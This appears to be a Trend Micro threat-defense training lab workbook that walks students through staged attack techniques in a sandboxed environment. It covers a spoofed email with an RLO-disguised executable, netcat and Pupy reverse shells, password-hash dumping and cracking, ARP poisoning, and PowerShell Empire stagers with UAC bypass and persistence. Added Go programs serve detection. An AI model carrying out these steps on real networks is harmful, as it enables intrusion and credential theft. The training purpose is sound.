Trend Micro, the Trend Micro t-ball logo, InterScan, VirusWall, ScanMail, ServerProtect, and TrendLabs
are trademarks or registered trademarks of Trend Micro Incorporated. All other product or company
names may be trademarks or registered trademarks of their owners.
Portions of this manual have been reprinted with permission from other Trend Micro documents. The
names of companies, products, people, characters, and/or data mentioned herein are fictitious and are
in no way intended to represent any real individual, company, product, or event, unless otherwise noted.
Information in this document is subject to change without notice.
No part of this publication may be reproduced, photocopied, stored in a retrieval system, or transmitted
without the express prior written consent of Trend Micro Incorporated.
Table of Contents
Introduction.................................................................................................. 5
About this Book .................................................................................................................... 7
Laboratory Introduction ....................................................................................................... 7
Trend Micro Training Cloud Access ...................................................................................... 7
Virtual Environment ............................................................................................................. 9
User Credentials .............................................................................................................9
Accessing the Virtual Machines ...................................................................................................10
Introduction
This chapter gives information about the following items:
• Lab introduction
• Training environment
• Lab Setup
• Credentials
• Accessing the Virtual Machines
It contains only the instructions for the exercises and labs discussed throughout this part of the
Advanced Threat Defense course.
Laboratory Introduction
This workshop manual refers to a pre-configured environment which is provided by Certified Trainers
during the course.
As the environment is hosted on the Trend Micro Training Cloud, a host computer with an active
internet connection is required for access.
Read all the information in this chapter carefully, as it outlines how to access and use the
environment.
In order to access the vApp assigned by the Certified Trainer, follow the guidelines below:
1. Open the invitation email sent from noreply-productcloud@trendmicro.com.
2. Click the link in the invitation email.
4. Make sure that the status is [Powered On], then click the [Enter Lab View] icon.
If the status is [Powered Off], tick the checkbox □ on the left and click the ▶ icon.
Virtual Environment
The virtual environment contains 4 virtual machines:
The following table lists additional information about the virtual machines:
Note: You will notice that not all of the virtual machines used during this part of the Advanced
Threat Defense course are running the latest available operating systems. As attacks most
likely use similar methodologies, such as sniffing network traffic, using older operating
systems will not affect the learning outcome of this course.
User Credentials
The following credentials should be used to log in to each virtual machine:
Note: The screenshots in this section are indicative only; some attributes, such as name, will
depend on the vApp currently assigned to your student account.
1. In the [Lab View] window, make sure the [Status] column for all the virtual machines indicates
Powered On.
2. Select the virtual machine you would like to access and click the [Remote Control] icon.
3. A screen like the one below appears after the [Remote Control] icon is clicked.
4. The logon screen will appear several seconds after the above screen appears.
Point of Entry
This chapter demonstrates an example for the 2nd stage of a typical APT, Point of Entry:
• Sending a spoofed email using a malicious attachment
demo.screenshot.jpg
gpj.tohsneedemo.scr
7. Place the cursor at the very left of the second line, before the letter g:
8. Right-click at the cursor position and select Insert Unicode control character > RLO Start of right-to-
left override:
11. Right-click and select Insert Unicode control character > LRO Start of left-to-right
override.
12. The first half of the text, rcs.omed, flips horizontally again, this time forming
demo.screenshot.jpg:
Using Unicode control characters, we are able to manipulate Windows into displaying the
potentially harmful and executable SCR file as a harmless JPG file.
13. Copy the modified text (second line) to the clipboard.
Copying the text may be tricky, as the cursor will move backwards (right to left) from “g” to
“e” of “eenshot.jpg”. Double-clicking the line selects the whole line.
The actual file name will not be changed; however, the controls we have inserted simply
dictate the direction of the letters so that Windows will know how to present them to the
user.
14. Open Windows Explorer.
15. Navigate to “C:\Tools”.
16. Right-click on “payload.exe” and select Rename.
17. Select all of the existing text, including the file extension.
Paste the modified text as the new name for the file, making sure the old “.exe” extension is
removed in the process.
When prompted about the new file extension, click on “Yes”:
19. As the Unicode control characters do not affect some views of Windows Explorer, make sure
that you set the view to List or Details:
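The trick above relies entirely on how a name is drawn; the operating system still sees “.scr” at the end of the stored name. The following Go program is an added example and is not part of the Trend Micro manual or of any tool it uses. It shows the check a mail gateway or endpoint agent can apply to attachment names: strip the Unicode bidirectional controls, report the extension Windows will actually use, and, for the single right-to-left override case, show what the user would have seen. The sample file name is constructed for the example.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// Unicode bidirectional control characters. None of them is visible, yet
// each changes how the characters around it are laid out on screen.
var bidiControls = map[rune]string{
	'\u202A': "LRE", '\u202B': "RLE", '\u202C': "PDF",
	'\u202D': "LRO", '\u202E': "RLO",
	'\u2066': "LRI", '\u2067': "RLI", '\u2068': "FSI", '\u2069': "PDI",
}

// NameReport describes what a file name really is versus how it appears.
type NameReport struct {
	Controls      []string // bidi controls found, in order of appearance
	StrippedName  string   // the name with every bidi control removed
	RealExtension string   // the extension Windows will actually use
	ApparentName  string   // how the name is displayed (simplified model)
}

// InspectFileName flags bidi controls in a file name and reports the
// extension the operating system will act on. ApparentName uses a
// simplified rendering: characters after an RLO (U+202E) are shown in
// reverse until an LRO (U+202D) restores left-to-right order. That covers
// the overrides used in the exercise, not the full Unicode bidi algorithm.
func InspectFileName(name string) NameReport {
	var rep NameReport
	var stripped, shown, run []rune
	reversed := false
	flush := func() { // emit the pending right-to-left run, reversed
		for i := len(run) - 1; i >= 0; i-- {
			shown = append(shown, run[i])
		}
		run = run[:0]
	}
	for _, c := range name {
		if label, ok := bidiControls[c]; ok {
			rep.Controls = append(rep.Controls, label)
			switch c {
			case '\u202E':
				flush()
				reversed = true
			case '\u202D':
				flush()
				reversed = false
			}
			continue
		}
		stripped = append(stripped, c)
		if reversed {
			run = append(run, c)
		} else {
			shown = append(shown, c)
		}
	}
	flush()
	rep.StrippedName = string(stripped)
	rep.ApparentName = string(shown)
	rep.RealExtension = strings.ToLower(filepath.Ext(rep.StrippedName))
	return rep
}

func main() {
	// Constructed sample: the stored name ends in ".scr", but the RLO makes
	// the tail read "rcs.jpg" in any view that honours bidi controls.
	rep := InspectFileName("demo_\u202Egpj.scr")
	fmt.Printf("stored: %s\nshown : %s\ncontrols: %v\nreal extension: %s\n",
		rep.StrippedName, rep.ApparentName, rep.Controls, rep.RealExtension)
}
```

For the constructed sample the report gives a stored name of demo_gpj.scr, a displayed name of demo_rcs.jpg and a real extension of .scr. Legitimate attachment names almost never need these control characters, so quarantining any name that contains one is a cheap and reliable rule; comparing the real extension against the displayed one tells the analyst what the sender was trying to hide.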
Note: For testing purposes, Security and Authentication options are not enforced in this
environment.
6. Click “OK”.
7. On the Account Settings, click the Attacker mailbox at the top of the list and select Manage
Identities > Add.
8. Specify boss@your.company.com as email address and click “OK”.
Ensure that the Outgoing Server (SMTP) is the correct one, as seen in step 5.
9. Close all pop-ups and start composing a new email by clicking “Write”.
Specify the following details:
From: boss@your.company.com
To: Victim@ACE202.TrendMicro
Subject: Demo Screenshot
Body:
Please check the attached screenshot.
Regards,
Boss
10. Click “Attach” and attach the modified demo.screenshot.jpg from the “Tools” folder.
Note that the real filename of the attachment will still be displayed by the email client.
11. Click on “Send”.
12. Switch to the Victim machine to check the email we have sent.
13. Open Mozilla Thunderbird. Enter the password for the Victim account when prompted.
14. Mozilla Thunderbird automatically sends and receives emails on launch.
If it does not retrieve messages automatically, click the “Get Mail” button. The test email we
sent from the Attacker machine should appear in the Inbox:
16. Open a command prompt and navigate to the user's temp folder:
cd %temp%
17. List the content of the user's temp folder using the command:
dir
A normal image will open in the Windows Photo Preview application. This is the normal
behavior expected by the user. However, behind the scenes, the user is not aware that the
executable malware we have sent is also capable of doing other things, including dropping a
malicious payload.
21. Go back to the command prompt and display the contents of the user's temp folder again:
dir
This time, a Successful_Attack.txt file is listed. This is the payload of our executable file,
which proves our attack was successful. In real attack scenarios, this could be another
malicious executable rather than a “.txt” file.
Netcat (nc) has been added to “c:\windows\system32”, so we can run the application from
anywhere in the command line.
Note: Refer to the Appendix B.1 on page 113 for additional information on Netcat parameters.
4. This will start Netcat, which will listen on port 4444 and pass on cmd.exe to the remote host once
a connection is established:
Note: At this stage, anyone who connects to the Victim machine on port 4444 will be able to
receive shell access on the target.
As mentioned above, this command will give us shell access to the Victim machine.
7. Type the following command:
ipconfig
8. As a result, the IP configuration of the Victim machine should be displayed, as we’re running the
command directly on a command prompt on the Victim machine:
9. Close the command prompt on both the Attacker and the Victim machines.
nc -lvp 4444
5. This command establishes communication with the Attacker machine on port 4444 and passes
on cmd.exe to the Attacker:
ipconfig
8. We can see that “ipconfig” displays Victim's IP address from the Attacker's command prompt:
9. Close the command prompt window on both the Attacker and the Victim machines.
Pupy is an open-source, cross-platform, multi-function RAT and post-exploitation tool written mainly
in Python. Pupy can reflectively migrate into other processes.
1. Login to the Ubuntu machine. (default user: ubuntu, password: novirus=123)
2. Right-click on the Desktop and select Open Terminal.
3. Navigate to the directory of Pupy:
cd pupy/pupy
Note: As commands in Linux operating systems, such as Ubuntu, are case-sensitive, be sure to type
all commands with the proper case as shown in this manual.
Refer to Appendix B.2 on page 113 for references on the Pupy command set.
4. Type the following command to create “backdoor.exe”, which will be used as a remote client
capable of connecting back to the Ubuntu machine:
6. In order to receive any communication from a client running the “backdoor.exe”, we will need to
create a listener, waiting for incoming connections. Run the following command:
sudo ./pupysh.py
Once “backdoor.exe” is executed on a Victim machine, it will establish a shell session back to the
Pupy shell.
8. Switch to Victim machine.
9. Select Start > Run and type the following command to connect to an SMB share, where the
“backdoor.exe” is stored:
\\192.168.100.151\winshare
10. From the “winshare” folder, copy the backdoor.exe to the desktop of the Victim machine.
11. Close or minimize the Windows Explorer window.
12. Execute the backdoor.exe.
13. You will notice that there is no graphical interface for backdoor.exe. To confirm it is running,
right-click anywhere on the taskbar and select Start Task Manager.
14. In the Task Manager window, click on the tab “Processes”.
15. The backdoor.exe will be listed as running:
17. In the Pupy shell window you can see the “Session 1 opened...”, displaying the IP address of the
Victim.
This proves the connection between Ubuntu and Victim machine has been established
successfully:
help
19. Type the following command to get more info about the current session:
info
20. This will display different items, such as the registered user name and host name belonging to
the Victim machine:
21. Try to get shell access (command prompt) to the Victim machine with the command:
shell
This will launch the command prompt from the Victim machine:
22. Confirm this is the command prompt of the Victim machine with the command:
hostname
ipconfig
This command shows the IP configuration of the Victim machine. Both commands prove that we
currently have shell access on the target machine.
24. Leave the command prompt of the Victim using the command:
exit
The connection with the Victim machine stays open; the “exit” command only closes the remote
command prompt.
25. Open notepad.exe on the Victim using exec command:
exec notepad.exe
migrate -p explorer.exe
When done properly, this allows malicious processes to be hidden within “normal” processes.
31. Once the process is migrated into explorer.exe, we can see that another session has opened while
the original session was automatically closed:
This is normal behavior, as the process itself has been changed and the communication needed
to be re-established.
32. Switch to the Victim machine.
getpid
40. The output should be the same as the PID shown on the Task Manager in step 38:
We have now confirmed that we have successfully migrated “backdoor.exe” into the explorer.exe
process, so that the application is no longer obviously visible.
41. Get the Session ID by typing the command:
sessions
42. Kill the session using the Session ID received in step 41 - in our example the Session ID is “1”:
sessions -k 1
Lateral Movement
This chapter, supporting the 4th stage of a typical APT attack, demonstrates
the following methodologies:
• Retrieving Password Hashes: LM & NTLM
• Cracking Password Hashes
• Performing ARP Poisoning
• Fileless Attacks
• Privilege Escalation
• Other infiltration possibilities: psexec, at, wmic
• Remote Port Forwarding
• Authentication using Pass-the-Hash
• Kerberos Golden Ticket Attack
cd \tools
If the command is executed properly, the message "The command completed successfully."
will appear.
Note: Refer to Appendix B.3 on page 114 for more information about the net command.
5. View the hashes of the newly created account test using gsecdump-v2b5.exe:
Note: Refer to Appendix B.4 on page 114 for more information of gsecdump parameters.
6. Since we did not set a password for this account, the hashes for the test account appear as:
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
7. View the hashes of the built-in Guest account using the command:
8. Take note of the LM and NTLM hashes for the Guest account, which does not require a
password to log in. They are exactly the same as the ones from the newly created test
account:
10. View the hashes of the test account again, to confirm the changes:
11. Compare the previous password hashes with the new ones. Both the LM and the NTLM
hashes should have been updated with the following:
8dc75c53a8482736aad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569
At first glance, the hashes are completely different; however, on closer inspection, the
second 16 characters of the LM hash have the value "aad3b435b51404ee", which is the same as
the second 16 characters of the blank-password hash.
12. Change the password of the test account to an all-capital "TREND”:
14. Compare the hash of the passwords "Trend" with the all-capital "TREND". You will notice that
the NTLM hash changed but the LM hash remained the same. This shows that the LM hash is
not case-sensitive:
15. Change the password of the test account to use the 14-character password
"_Trend Trend_":
17. The LM hash has a 14-character restriction, and Windows calculates the LM hash by dividing
the password into two 7-character sets. In this example, the password "_Trend Trend_" is
divided into "_Trend_" and another "_Trend_". Looking at the LM hash, you will notice that
the hash for the 7 characters repeats:
The hash for "_Trend_" is "1a01f628ff51c0eb", so the hash for "_Trend Trend_" becomes
"1a01f628ff51c0eb1a01f628ff51c0eb".
18. Change the password of the test account to "_Trend Trend_ABCDEFGH":
This new password has more than 14 characters which exceeds the LM hash limit.
19. View the hashes of the test account again:
20. The LM hash will look familiar, as it is the same as the LM hash of a blank password. This
means that when a password exceeds the 14-character limit, the NTLM hash will be calculated but
the LM hash will have no value:
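Every observation in steps 11 to 20 follows from how the LM hash is built: the password is uppercased, padded with zero bytes to 14 bytes, split into two 7-byte halves, and each half is used as a DES key to encrypt the constant string "KGS!@#$%". The following Go program is an added example and is not part of the manual or of gsecdump; it implements that computation so the observations can be reproduced on any machine. The passwords in main are constructed for the example; the 14-character one is written with two underscores in the middle so that both halves read "_TREND_", matching the repeated-half case the exercise describes. Only ASCII passwords are handled here (Windows uppercases through the OEM code page for other characters).

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// lmMagic is the fixed plaintext each half of the LM hash encrypts.
var lmMagic = []byte("KGS!@#$%")

// desKeyFrom7 spreads 56 key bits over 8 bytes, 7 bits per byte, as DES
// expects. The low bit of each byte is the parity bit, which DES ignores.
func desKeyFrom7(k []byte) []byte {
	var bits uint64
	for _, b := range k {
		bits = bits<<8 | uint64(b)
	}
	key := make([]byte, 8)
	for i := range key {
		key[i] = byte((bits>>(49-7*i))&0x7F) << 1
	}
	return key
}

// LMHash computes the LAN Manager hash of an ASCII password: uppercase it,
// pad with zero bytes to 14, split into two 7-byte halves and use each as a
// DES key to encrypt lmMagic. Passwords longer than 14 characters get the
// blank-password hash, which is what Windows stores in that case.
func LMHash(password string) (string, error) {
	pw := []byte(strings.ToUpper(password))
	if len(pw) > 14 {
		pw = nil
	}
	padded := make([]byte, 14)
	copy(padded, pw)
	out := make([]byte, 0, 16)
	for _, half := range [][]byte{padded[:7], padded[7:]} {
		block, err := des.NewCipher(desKeyFrom7(half))
		if err != nil {
			return "", err
		}
		enc := make([]byte, 8)
		block.Encrypt(enc, lmMagic)
		out = append(out, enc...)
	}
	return hex.EncodeToString(out), nil
}

func main() {
	// Constructed passwords; the 14-character one has two underscores in
	// the middle so that both 7-character halves read "_TREND_".
	for _, pw := range []string{"", "Trend", "TREND", "_Trend__Trend_", "_Trend__Trend_ABCDEFGH"} {
		h, err := LMHash(pw)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%-24q %s %s\n", pw, h[:16], h[16:])
	}
}
```

The program prints each hash as its two 16-character halves, which makes the weaknesses visible at a glance: an all-zero key encrypts the constant to aad3b435b51404ee, so that value in the second half means the password is 7 characters or shorter; "Trend" and "TREND" give the same hash because the input is uppercased; and identical 7-character halves give identical blocks. Each half is an independent, case-insensitive, at most 7-character secret, which is why the rainbow tables used in the ophcrack exercise recover LM passwords in seconds and why the "Do not store LAN Manager hash value" policy discussed in the next activity should stay enabled.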
cd \tools\samdump2
5. Create a new user account named test with "Trend" as its password:
Note: Refer to Appendix B.5 on page 115 for more information about samdump2 parameters.
7. The LM and the NTLM hashes should have the following values:
aad3b435b51404eeaad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569
8. As you may remember from the previous activity, when the password is set to "Trend", the hashes
change to this value:
8dc75c53a8482736aad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569
Comparing these two results, we can see that the NTLM hashes are the same but the LM
hashes are not. The LM hash in this exercise has the same value as that of a blank password.
This is due to a local security policy in Windows 7, which is enabled by default.
9. To change this security policy, click on Start and type secpol.msc. This will open the Local
Security Policy Management Console.
10. Expand Security Settings > Local Policies > Security Options in the left panel:
11. Double-click on Network security: Do not store LAN Manager hash value on the next
password change in the list of settings.
12. You will see that this policy is enabled by default. This causes the LM hash to appear as that of a
blank password:
LM & NTLM HASHES: SECURITY POLICY ON WINDOWS 7 PREVENTING LM HASH BEING STORED
Note: Do not enable this policy on the Windows 2003 server, as this will otherwise cause follow-up
exercises to fail.
cd \tools
You will receive a warning for user test4, as the password exceeds 14 characters. Press
<Y> to create the user.
5. Dump the hashes of all user accounts into a text file named hashes.txt:
cd \tools\samdump2
9. On the command prompt, type in the following commands to create 3 accounts with different
passwords:
10. Dump the hashes of all user accounts into a text file named hashes.txt:
6. Leave all other options as per default and click “Next” three times to start the installation.
The installation process begins. This may take a few minutes to complete.
7. Click “Next” when the installation is complete, followed by “Finish” to close the Setup Wizard.
8. Double-click the ophcrack shortcut on the desktop.
9. Click “Load” from the menu and select PWDUMP file.
10. In the Open PWDUMP File pop up, select C:\Tools\hashes.txt and click “Open”:
12. In the Tables pop up, click on the Install button. The "Browse For Folder" window will appear.
13. Select the folder C:\Tools\tables_xp_free_fast and click “OK”.
14. Click “OK” again to go back to the main window. The table XP free fast should be listed in
the bottom panel:
Note that ophcrack splits and displays the LM password in 2 different columns, “LM Pwd 1”
and “LM Pwd 2”.
15. Click on the “Crack” button to start retrieving the passwords from the hashes.
16. Click on the plus + sign next to XP free fast on the table list.
This will provide the progress for the current password retrieval.
You will notice that the LM Pwd 1, LM Pwd 2, and NT Pwd columns are slowly being
populated with the passwords you provided at the start of the exercise.
Certain user accounts’ passwords will be shown as "not found" for different reasons:
cd \tools\john179j5\run
4. Use the John the Ripper tool to crack the password from the hashes using the brute force
technique:
Note: Refer to Appendix B.6 on page 115 for further information on john parameters.
5. This process may take some time to complete because of the complexity of one of the
passwords we have set. Within just a few seconds however, we should see the results for the
first two passwords.
Pressing any key will list the current password that John the Ripper is trying to crack.
6. Once the tool has finished with the first two hashes, abort the process by pressing
<CTRL>+<C>.
7. Three new files, namely john.pot, john.rec and john.log, have been created. View the contents
of the john.pot file for the list of the passwords acquired through brute force:
type john.pot
8. The file contains successfully cracked passwords with their respective NTLM hashes:
We do not need to change any settings for WinPcap, therefore install it with all default
options.
6. Be sure to leave Automatically start the WinPcap driver at boot time selected and click
“Install”:
4. Open a command prompt and run the following command to query the ARP cache:
arp -a
ping 192.168.100.111
arp -a
8. The MAC addresses of all machines, Attacker (192.168.100.111), Server (192.168.100.131) and
Ubuntu (192.168.100.151), are now in the list, marked as “dynamic”:
Also note that the MAC address of each machine is unique.
5. If the list already contains entries from a previous install, right-click an entry and select
Remove All.
6. Right-click on an empty space on the table and select Scan MAC Address:
7. In the MAC Address Scanner pop-up, select All hosts in my subnet:
10. After the tool has scanned for MAC addresses, write down in the table below the MAC address
corresponding to each IP address:
IP Address        MAC Address
192.168.100.121   005056014F61
192.168.100.131   005056014F63
192.168.100.151   0050560156B9
MAC AND IP ADDRESS MAPPING
11. Click on the APR tab at the bottom to configure ARP poisoning routing.
12. Click on an empty slot on the table at the top to enable the Add to List button:
15. Select the IP address of the Server, 192.168.0.131, on the right panel and click “OK”.
Note: It does not matter which machine is selected first on the left. ARP poisoning will cause
both targets to update their ARP cache entry for the opposite side with the MAC address of
the Attacker.
16. A new entry will be listed in the main window of Cain, showing the status “Idle”:
You will notice that the status of the selected targets in the list changes from “Idle” to
“Poisoning”.
18. Switch back to the Victim machine.
19. Using a command prompt, check the ARP cache again:
arp -a
The ARP cache now shows the Server machine, 192.168.100.131, having the same MAC
address as the Attacker machine.
20. Connect to the FTP server hosted at the Server machine using the command:
ftp 192.168.100.131
quit
.exe
Notice that FTP has a value of (1). This means the Cain program was able to sniff one (1)
password sent using the FTP protocol.
26. Switch to the Server machine.
27. Using a command prompt, ping the Attacker machine:
ping 192.168.100.111
arp -a
The output should show that the Victim, 192.168.100.121, is cached with the same MAC
address as the Attacker on 192.168.100.111.
29. Stop ARP Poisoning and the Network Sniffer using their respective icons:
Note: ARP poisoning works only on local networks within the same subnet. Therefore, Cain &
Abel will not be useful when trying to perform the above activity between routed networks.
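The symptom inspected in steps 19 and 28, two IP addresses cached with the same MAC address, is exactly what a defender looks for. The following Go program is an added example and is not part of the manual or of Cain & Abel: it parses the Windows `arp -a` table format and reports every unicast MAC address that is claimed by more than one IP address. The sample output is constructed; the entries for .121, .131 and .151 follow the mapping table from step 10, while the MAC address of the Attacker (192.168.100.111) is a placeholder because the manual does not give it.

```go
package main

import (
	"bufio"
	"fmt"
	"sort"
	"strings"
)

// Constructed sample of `arp -a` output as seen on the Victim machine
// during poisoning: the Server entry (.131) now carries the Attacker's MAC.
// The Attacker MAC (.111) is a constructed placeholder.
const sampleArp = `
Interface: 192.168.100.121 --- 0xb
  Internet Address      Physical Address      Type
  192.168.100.1         00-50-56-01-00-01     dynamic
  192.168.100.111       00-50-56-01-4f-60     dynamic
  192.168.100.131       00-50-56-01-4f-60     dynamic
  192.168.100.151       00-50-56-01-56-b9     dynamic
  192.168.100.255       ff-ff-ff-ff-ff-ff     static
`

// ParseArpCache returns an IP -> MAC map for the unicast entries in Windows
// `arp -a` output. Header lines, the broadcast address and IPv4 multicast
// MACs are skipped, as they legitimately repeat.
func ParseArpCache(output string) map[string]string {
	entries := map[string]string{}
	sc := bufio.NewScanner(strings.NewReader(output))
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		if len(f) != 3 || strings.Count(f[1], "-") != 5 {
			continue
		}
		mac := strings.ToLower(f[1])
		if mac == "ff-ff-ff-ff-ff-ff" || strings.HasPrefix(mac, "01-00-5e") {
			continue
		}
		entries[f[0]] = mac
	}
	return entries
}

// DuplicateMACs reports every MAC address that the cache maps to more than
// one IP address, with the IPs sorted. On a switched LAN a unicast MAC
// belongs to a single host, so a shared MAC is the signature of ARP
// poisoning (or, more rarely, a misconfigured host or cluster address).
func DuplicateMACs(entries map[string]string) map[string][]string {
	byMAC := map[string][]string{}
	for ip, mac := range entries {
		byMAC[mac] = append(byMAC[mac], ip)
	}
	dups := map[string][]string{}
	for mac, ips := range byMAC {
		if len(ips) > 1 {
			sort.Strings(ips)
			dups[mac] = ips
		}
	}
	return dups
}

func main() {
	for mac, ips := range DuplicateMACs(ParseArpCache(sampleArp)) {
		fmt.Printf("ALERT: %s claimed by %s\n", mac, strings.Join(ips, ", "))
	}
}
```

Run against the constructed table it reports the placeholder Attacker MAC as claimed by both 192.168.100.111 and 192.168.100.131. The same check can be scheduled on workstations or fed from switch ARP tables; for a stronger control, Dynamic ARP Inspection on the access switches drops the forged replies before any cache is changed, which matches the note that the attack is confined to the local subnet.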
cd empire
sudo ./empire
Note: Refer to Appendix B.7 on page 116 for an overview of Powershell Empire commands.
Before Powershell Empire can be used for exploitation and further infiltration of a target
machine, Listeners need to be created. Listeners in Powershell Empire are the channels which
receive connections from our target machine.
5. Type the following command to navigate into the listener option:
listeners
It is normal to have a result of “No listeners currently active” on the list when you enter this
command for the first time.
6. To view options under listeners, type:
help
7. Start a listener module for http in Powershell Empire using the command:
uselistener http
help
9. Use the following command to show information and required parameters for the particular type
of listener:
info
Fields under “Required” that are set to “True” should be filled with appropriate values. In this
case, all are set accordingly.
10. Start the listener using the command:
13. To list all available stagers, type the following command, followed by <Space>, <Tab>, <Tab>:
Stagers in Powershell Empire are used to set the stage for the post-exploitation activities. They
are similar to payloads, which are used to create a connection back to Empire.
14. This will display a list of available stagers:
Powershell Empire can create loaders with different file types like “.vbs”, “.bat” etc. In this
exercise, we will use a “.lnk” file as a loader (stager).
15. To use a link file (shortcut) as a stager, type the following command:
16. Similar to the command uselistener, we can get more information and parameters about this
particular stager by running the command:
We can see that Listener is a required parameter, but has no value set yet. We will need to supply
the value in order to use the stager.
17. Set the Listener parameter of the stager to http:
18. As we’re creating a shortcut file, we also need to set the location of the stager output file. To
specify the location, type in the following command:
19. This completes the configuration of the stager. To execute the stager, run the command:
20. The output will indicate that the .lnk file has been successfully created:
\\192.168.100.151\winshare
This will open an SMB share located on the Ubuntu machine, where we saved the “.lnk” stager file.
24. Copy the clickme.lnk to the desktop.
25. To analyze the content of the shortcut file, open Notepad.
26. In Notepad, open the file clickme.lnk from the Desktop.
Ensure to select Format > Word Wrap to see all contents.
27. We can identify that this is indeed a script written in PowerShell, even though the content of the
script is base64-encoded and not readable:
The agent will report back with a random name. To identify easily what agent is being used in
case of multiple connections, it is recommended to rename the agent.
35. Type the following command to rename the agent:
Note: Replace 94MDPWE8 with your own agent name as identified in step 34.
36. To identify whether the rename was successful, run this command again:
37. To interact or use the agent called “Victim1”, use the following command:
38. Similar to previous modules, the following command shows a list of all available
commands:
39. To use the command prompt on the target machine to display its hostname, type the command:
This shows that the command was executed on the remote machine rather than
locally.
41. Press <Enter>.
42. To view system information of the target, run the command:
43. The output will list some information about the target, such as the user currently running the
process, the operating system, IP address etc.:
In this activity, we used a “.lnk” file and not a Portable Executable file as a loader for our
backdoor, which will be later used for lateral movement.
44. Leave the Powershell Empire console open in preparation for the next activity.
Note: Before performing this exercise, ensure you have properly configured the backdoor and
reverse connection in Exercise 8.
usemodule
Modules in Powershell Empire are used to perform specific tasks, such as bypassing UAC,
creating persistence, dump password hashes etc.
3. First, we want to use a module capable of checking for any Windows privilege escalation vectors.
Run the following command:
usemodule privesc/powerup/allchecks
4. More information and parameters about this particular module can be obtained, similar to
listeners and stagers, with the command:
info
This module runs all current checks for Windows privilege escalation vectors. It has only
one required field, Agent, which is already set up accordingly.
execute
As you can see at the top of the output, the module detected that the local group has
administrative privileges and advises running a “BypassUAC attack” in order to elevate privileges.
8. Press <Enter>, followed by the command:
back
usemodule privesc/bypassuac
10. Type the following command to gain more insight about this specific module:
info
11. Any parameter, with the property Required set to “True” must be supplied. On this module,
Listener and Agent are the parameters required, whereas Listener has no value set yet:
12. To set a value for the Listener parameter, run the following command:
This will set the Listener to http, which we have already set up during Exercise 8.
info
execute
15. When requested, press <Y>, followed by <Enter> to run the task on the remote machine:
Once the module “BypassUAC” has been executed successfully, the target machine will use a new
agent for the elevated connection.
16. To identify the new agent, press <ENTER>, followed by the two commands:
back
agents
17. The list of agents should now contain 2 connections. Notice the * in front of the username for the
new agent:
The asterisk (*) indicates that the new agent created has successfully performed “BypassUAC”
and elevated from a medium integrity process to a high integrity process. The different
integrity levels are shown below:
Integrity Level   Assigned Access Rights
High              Full Administrator Rights
Medium            Standard User Rights
Low               Highly Restricted
PRIVILEGE ESCALATION: PROCESS INTEGRITY LEVEL
18. To easily identify the name of the agent, rename the latest added agent to Victim1A:
Note: Replace TMZ14E6Y with your own agent name as identified in step 18.
interact Victim1A
We have now established communication with the Victim with full administrative privileges. In
order to keep those rights, we will require persistence, allowing the access to survive a reboot of
the target machine. For this exercise, we will use the “schtasks” module, which maintains
persistence of a stager using the Windows Task Scheduler, running as the SYSTEM account.
21. Select the schtasks module by typing the following command:
usemodule persistence/elevated/schtasks*
22. List all required parameters of the module using the command:
info
24. Even though they are only optional parameters, we will change the settings for Listener and
OnLogon:
OnLogon sets the trigger of the scheduled task to “user logon”; as soon as a user logs in to the
remote machine, the task is being executed.
Listener is not required for this module, however we configured it to ensure that after a reboot
the target will reconnect to the Attacker machine.
Also note down the value of the TaskName, as we can use it later during the exercise to correctly
identify the created task.
25. To start the schtasks module, run the command:
execute
26. Once asked, press <Y> and <Enter> to run the module:
27. Once executed, press <Enter> again and type the back command twice:
33. Select the action Start a program from the list and click “Edit”.
34. The Program/script parameter is powershell.exe itself. However, the Add arguments (optional)
item shows the code generated by the schtasks module.
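The unreadable text seen in the .lnk file at step 27 and in the task arguments at step 34 is the -EncodedCommand form of a PowerShell script: the script as UTF-16LE text, base64-encoded. The following Go program is an added example, not part of the manual or of PowerShell Empire, that does what an analyst reviewing scheduled tasks or shortcut targets would do: decode the argument and list the traits (hidden window, no profile, encoded command, download-and-run cradle) that separate a loader from an ordinary administrative script. The encoded sample is constructed inside the program and its URL is a placeholder.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"sort"
	"strings"
	"unicode/utf16"
)

// Finding summarises what was found in a powershell.exe argument string.
type Finding struct {
	Decoded    string   // script hidden behind -EncodedCommand, if any
	Indicators []string // sorted reasons the arguments look like a loader
}

// decodeUTF16LE reverses what PowerShell expects after -EncodedCommand:
// base64 of the script encoded as UTF-16LE.
func decodeUTF16LE(b64 string) (string, bool) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil || len(raw) == 0 || len(raw)%2 != 0 {
		return "", false
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u)), true
}

// EncodeCommand is the inverse of decodeUTF16LE; it is used below only to
// build the constructed sample.
func EncodeCommand(script string) string {
	u := utf16.Encode([]rune(script))
	raw := make([]byte, 2*len(u))
	for i, c := range u {
		raw[2*i], raw[2*i+1] = byte(c), byte(c>>8)
	}
	return base64.StdEncoding.EncodeToString(raw)
}

// InspectArguments does what an analyst does when reviewing a task action
// or shortcut target: decodes any -enc payload and records the traits that
// separate a stager from an ordinary administrative script.
func InspectArguments(args string) Finding {
	var f Finding
	seen := map[string]bool{}
	note := func(label string) {
		if !seen[label] {
			seen[label] = true
			f.Indicators = append(f.Indicators, label)
		}
	}
	lower := strings.ToLower(args)
	flags := map[string]string{
		"-w hidden": "hidden window", "-windowstyle hidden": "hidden window",
		"-nop": "profile disabled", "-noni": "non-interactive",
		"-ep bypass": "execution policy bypass", "-sta": "single-threaded apartment",
	}
	for needle, label := range flags {
		if strings.Contains(lower, needle) {
			note(label)
		}
	}
	words := strings.Fields(args)
	for i, w := range words {
		switch strings.ToLower(w) {
		case "-e", "-enc", "-encodedcommand":
			if i+1 < len(words) {
				if s, ok := decodeUTF16LE(words[i+1]); ok {
					f.Decoded = s
					note("encoded command")
				}
			}
		}
	}
	body := strings.ToLower(f.Decoded)
	for _, m := range []string{"iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string"} {
		if strings.Contains(body, m) {
			note("script uses " + m)
		}
	}
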